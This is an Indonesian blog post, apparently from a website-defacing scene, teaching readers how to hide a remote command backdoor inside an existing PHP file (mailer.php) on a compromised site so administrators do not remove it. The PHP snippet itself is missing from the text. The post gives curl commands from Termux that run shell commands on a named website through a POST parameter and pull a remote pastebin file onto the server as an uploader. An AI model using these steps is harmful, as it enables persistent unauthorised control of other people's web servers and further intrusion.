TOP-LEFT ADS

Remote Shell backdoor anti tikung anti dorking anti ke delete admin

Halo halo selamat sore
Kali ini saya mau share remote Shell backdoor hehehe mantep gan ga kedelet admin juga , solusi buat agan2 juga yang up Shell tapi keterbatasan ,misal kegedean
Langsung aja kali ini di jalanin lewat cmd
Kalo user Andro makeknya termux oke liat gambar aja ya gan :"V
Langsung aja gan
Pertama buka Shell elu yang udah ketanem di website sebagai contohnya biar gak ribet hehe
1.

Nah selanjutnya
2.buka file yang mau kalian scriptnya , saya milih yang mailer.php
Bebas gan apa aja yang ada di situ asal ext.php
Nah jika sudah ke buka selanjutnya
3.masukan script ini tanpa tanda ( )
(
)
Ask ?
Kenapa itu peju ?
Oh itu cuman metode post nya bisa di ubah sesuai yang kalian mau
Oke jika udah dimasukkan dan di save
Skrang lanjut buka termux
4.usahakan termux sudah terinstall curl
Langsung aja
copy terus paste ini ke termux
$ curl http://bafront.com/images/mailer.php -d peju='ls'
curl http://bafront.com/images/mailer.php -d peju='curl -o oh.php https://pastebin.com/raw/YNpriSQu'
Lalu penampakan akan seperti ini

Nah jika sudah muncul seperti itu
Lalu copy paste ini ke termux
$ curl http://bafront.com/images/mailer.php  -d peju='ls'
Maka akan jadi seperti di bawah ini ,
Nah muncul file baru namanya oh.php
Oke mari coba cek
Nahkan jadi uploadernya  , oke sekian terimakasih.

0 Response to "Remote Shell backdoor anti tikung anti dorking anti ke delete admin"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel